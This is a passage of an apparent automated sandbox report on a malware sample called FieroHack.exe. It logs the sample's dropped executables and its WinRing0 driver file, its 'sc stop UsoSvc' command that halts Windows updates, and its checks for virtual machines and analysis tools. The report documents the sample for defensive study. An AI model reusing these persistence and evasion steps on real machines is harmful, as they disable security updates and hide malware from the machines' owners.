      Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: licensemanagersvc.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: licensemanager.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: clipc.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dll
      Source: C:\ProgramData\wdcnrrcmzwhi\leirdnhqqedj.exeSection loaded: apphelp.dll
      Source: C:\ProgramData\wdcnrrcmzwhi\leirdnhqqedj.exeSection loaded: windows.storage.dll
      Source: C:\ProgramData\wdcnrrcmzwhi\leirdnhqqedj.exeSection loaded: wldp.dll
      Source: C:\ProgramData\wdcnrrcmzwhi\leirdnhqqedj.exeSection loaded: profapi.dll
      Source: C:\Windows\System32\choice.exeSection loaded: version.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
      Source: C:\Windows\System32\wusa.exeSection loaded: dpx.dll
      Source: C:\Windows\System32\wusa.exeSection loaded: wtsapi32.dll
      Source: C:\Windows\System32\wusa.exeSection loaded: cryptsp.dll
      Source: C:\Windows\System32\wusa.exeSection loaded: kernel.appcore.dll
      Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
      Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dll
      Source: C:\Windows\explorer.exeSection loaded: iphlpapi.dll
      Source: C:\Windows\explorer.exeSection loaded: userenv.dll
      Source: C:\Windows\explorer.exeSection loaded: cryptbase.dll
      Source: C:\Windows\explorer.exeSection loaded: cryptsp.dll
      Source: C:\Windows\explorer.exeSection loaded: rsaenh.dll
      Source: C:\Windows\explorer.exeSection loaded: sspicli.dll
      Source: C:\Windows\explorer.exeSection loaded: powrprof.dll
      Source: C:\Windows\explorer.exeSection loaded: umpdc.dll
      Source: C:\Windows\explorer.exeSection loaded: mswsock.dll
      Source: C:\Windows\explorer.exeSection loaded: dhcpcsvc6.dll
      Source: C:\Windows\explorer.exeSection loaded: dhcpcsvc.dll
      Source: C:\Windows\explorer.exeSection loaded: dnsapi.dll
      Source: C:\Windows\explorer.exeSection loaded: napinsp.dll
      Source: C:\Windows\explorer.exeSection loaded: pnrpnsp.dll
      Source: C:\Windows\explorer.exeSection loaded: wshbth.dll
      Source: C:\Windows\explorer.exeSection loaded: nlaapi.dll
      Source: C:\Windows\explorer.exeSection loaded: winrnr.dll
      Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dll
      Source: C:\Windows\explorer.exeSection loaded: rasadhlp.dll
      Source: C:\Windows\explorer.exeSection loaded: fwpuclnt.dll
      Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
      Source: C:\Windows\explorer.exeSection loaded: amsi.dll
      Source: C:\Windows\explorer.exeSection loaded: profapi.dll
      Source: C:\Users\user\Desktop\FieroHack.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
      Source: Window RecorderWindow detected: More than 3 window changes detected
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
      Source: FieroHack.exeStatic file information: File size 6603296 > 1048576
      Source: FieroHack.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
      Source: Binary string: d:\hotproject\winring0\source\dll\sys\lib\amd64\WinRing0.pdb source: leirdnhqqedj.exe, 0000002B.00000003.2198922298.00000238BCBD0000.00000004.00000001.00020000.00000000.sdmp, qkrjwvgkutvb.sys.43.dr
      Source: initial sampleStatic PE information: section where entry point is pointing to: .rsrc
      Source: WeMod.exe.0.drStatic PE information: section name: .pexe
      Source: leirdnhqqedj.exe.2.drStatic PE information: section name: .pexe
      Source: C:\Users\user\AppData\Roaming\WeMod.exeCode function: 2_2_0000021E477BEE15 push esi; iretd 2_2_0000021E477BEE58
      Source: C:\Users\user\AppData\Roaming\WeMod.exeCode function: 2_2_0000021E477C44D3 push 158B4C11h; iretd 2_2_0000021E477C451D
      Source: C:\Users\user\AppData\Roaming\WeMod.exeCode function: 2_2_0000021E477BF8B8 pushad ; iretd 2_2_0000021E477BF904
      Source: C:\Users\user\AppData\Roaming\WeMod.exeCode function: 2_2_0000021E477C2D2E push ecx; retf 2_2_0000021E477C2D2F
      Source: C:\Users\user\AppData\Roaming\WeMod.exeCode function: 2_2_0000021E477BF90E pushad ; iretd 2_2_0000021E477BF904
      Source: C:\Users\user\AppData\Roaming\WeMod.exeCode function: 2_2_0000021E477C2B82 push ds; iretd 2_2_0000021E477C2B83
      Source: C:\Users\user\AppData\Roaming\WeMod.exeCode function: 2_2_0000021E477C0778 push ss; retf 2_2_0000021E477C0779
      Source: C:\Users\user\AppData\Roaming\WeMod.exeCode function: 2_2_0000021E477BEF75 push edx; retf 2_2_0000021E477BEFAA
      Source: C:\Users\user\AppData\Roaming\WeMod.exeCode function: 2_2_0000021E477BEF49 push edx; retf 2_2_0000021E477BEFAA
      Source: C:\Users\user\AppData\Roaming\WeMod.exeCode function: 2_2_0000021E477BEF13 push edx; retf 2_2_0000021E477BEF48
      Source: C:\Users\user\AppData\Roaming\WeMod.exeCode function: 2_2_0000021E477BEEE0 push edx; retf 2_2_0000021E477BEF48
      Source: C:\Users\user\AppData\Roaming\Sirus.exeCode function: 7_2_0539C169 pushfd ; retf 7_2_0539C16B
      Source: C:\Users\user\AppData\Roaming\Sirus.exeCode function: 7_2_0539AED0 pushfd ; retf 7_2_0539AEDE
      Source: C:\Users\user\AppData\Roaming\Sirus.exeCode function: 7_2_05E13D0F pushfd ; retf 7_2_05E13D1E
      Source: C:\Users\user\AppData\Roaming\Sirus.exeCode function: 7_2_076DBB7C push es; retf 7_2_076DBB7F
      Source: C:\Users\user\AppData\Roaming\Sirus.exeCode function: 7_2_076DBB53 push ecx; retf 7_2_076DBB57
      Source: C:\Users\user\AppData\Roaming\Sirus.exeCode function: 7_2_076DBB3C push ebp; retf 7_2_076DBB3D
      Source: C:\Users\user\AppData\Roaming\Sirus.exeCode function: 7_2_076DBB04 push edx; retf 7_2_076DBB05
      Source: C:\Users\user\AppData\Roaming\Sirus.exeCode function: 7_2_076DBA63 push edx; retf 7_2_076DBA64
      Source: C:\Users\user\AppData\Roaming\Sirus.exeCode function: 7_2_076DBA7C push esi; retf 7_2_076DBA7D
      Source: C:\Users\user\AppData\Roaming\Sirus.exeCode function: 7_2_076DBA46 push esi; retf 7_2_076DBA4A
      Source: C:\Users\user\AppData\Roaming\Sirus.exeCode function: 7_2_076DBA2D push edx; retf 7_2_076DBA31
      Source: C:\Users\user\AppData\Roaming\Sirus.exeCode function: 7_2_076DBA16 push esi; retf 7_2_076DBA17
      Source: C:\Users\user\AppData\Roaming\Sirus.exeCode function: 7_2_076DBAD6 push ebp; retf 7_2_076DBAD7
      Source: C:\Users\user\AppData\Roaming\Sirus.exeCode function: 7_2_076DBAA1 push ebp; retf 7_2_076DBAAA
      Source: C:\Users\user\AppData\Roaming\Sirus.exeCode function: 7_2_076DBD33 push ebx; retf 7_2_076DBD37
      Source: C:\Users\user\AppData\Roaming\Sirus.exeCode function: 7_2_076DB9E3 push esi; retf 7_2_076DB9E4
      Source: C:\Users\user\AppData\Roaming\Sirus.exeCode function: 7_2_076DB9FD push ebx; retf 7_2_076DB9FE
      Source: C:\Users\user\AppData\Roaming\Sirus.exeCode function: 7_2_076DB9CA push ebx; retf 7_2_076DB9CB
      Source: C:\Users\user\AppData\Roaming\Sirus.exeCode function: 7_2_076DBC4E push eax; retf 7_2_076DBC4F
      Source: C:\Users\user\AppData\Roaming\Sirus.exeCode function: 7_2_076DBC5B push esp; retf 7_2_076DBC64

      Persistence and Installation Behavior

      Source: C:\ProgramData\wdcnrrcmzwhi\leirdnhqqedj.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Roaming\Obsidium\
      Source: C:\ProgramData\wdcnrrcmzwhi\leirdnhqqedj.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Roaming\Obsidium\{3D20819C-5D02B5C8-D5AE7FCB-C4F5C439}
      Source: C:\ProgramData\wdcnrrcmzwhi\leirdnhqqedj.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Roaming\Obsidium\{3D20819C-5D02B5C8-D5AE7FCB-C4F5C439}\6796.obs
      Source: C:\ProgramData\wdcnrrcmzwhi\leirdnhqqedj.exeFile created: C:\Windows\TEMP\qkrjwvgkutvb.sys
      Source: C:\Users\user\AppData\Roaming\WeMod.exeFile created: C:\ProgramData\wdcnrrcmzwhi\leirdnhqqedj.exe
      Source: C:\ProgramData\wdcnrrcmzwhi\leirdnhqqedj.exeFile created: C:\Windows\Temp\qkrjwvgkutvb.sys
      Source: C:\Users\user\Desktop\FieroHack.exeFile created: C:\Users\user\AppData\Roaming\WeMod.exe
      Source: C:\Users\user\AppData\Roaming\WeMod.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop UsoSvc

      Hooking and other Techniques for Hiding and Protection

      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
      Source: C:\Users\user\Desktop\FieroHack.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Roaming\Sirus.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Roaming\Sirus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\explorer.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\explorer.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

      Malware Analysis System Evasion

      Source: C:\Users\user\AppData\Roaming\WeMod.exe; System information queried: FirmwareTableInformation
      Source: C:\ProgramData\wdcnrrcmzwhi\leirdnhqqedj.exe; System information queried: FirmwareTableInformation
      Source: C:\Windows\explorer.exe; System information queried: FirmwareTableInformation
      Source: explorer.exe, 00000045.00000002.4114240353.0000000000B0D000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: PROCESSHACKER.EXE
      Source: Sirus.exe, 00000007.00000002.1976423267.00000000028F4000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: \QEMU-GA.EXE@\^Q
      Source: Sirus.exe, 00000007.00000002.1976423267.00000000028F4000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: \QEMU-GA.EXE`,^Q
      Source: Sirus.exe, 00000007.00000002.1976423267.00000000028F4000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: \QEMU-GA.EXE
